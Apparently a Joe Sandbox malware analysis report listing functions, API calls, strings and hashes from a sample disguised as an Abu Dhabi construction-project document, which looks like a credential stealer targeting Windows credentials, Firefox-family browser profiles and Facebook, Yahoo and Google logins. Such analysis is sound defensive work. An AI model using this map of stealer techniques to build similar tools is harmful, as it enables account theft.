                                                                                                                          • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041249C
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                          • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                          • wcscpy.MSVCRT ref: 004125A0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                          • String ID: r!A
                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                          • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                          • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                          • API String ID: 2936932814-4196376884
                                                                                                                          • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                          • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                          Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                                          • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                          • String ID: C:\Windows\system32
                                                                                                                          • API String ID: 669240632-2896066436
                                                                                                                          • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                          • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                          Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                          • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 697348961-0
                                                                                                                          • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                          • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                          • API String ID: 4039892925-11920434
                                                                                                                          • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                          • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                          • API String ID: 4039892925-2068335096
                                                                                                                          • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                          • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                          • API String ID: 4039892925-3369679110
                                                                                                                          • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                          • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                          • String ID: $0.@
                                                                                                                          • API String ID: 2758756878-1896041820
                                                                                                                          • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                          • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                          Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2941347001-0
                                                                                                                          • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                          • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFilefreememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2507021081-0
                                                                                                                          • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                          • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
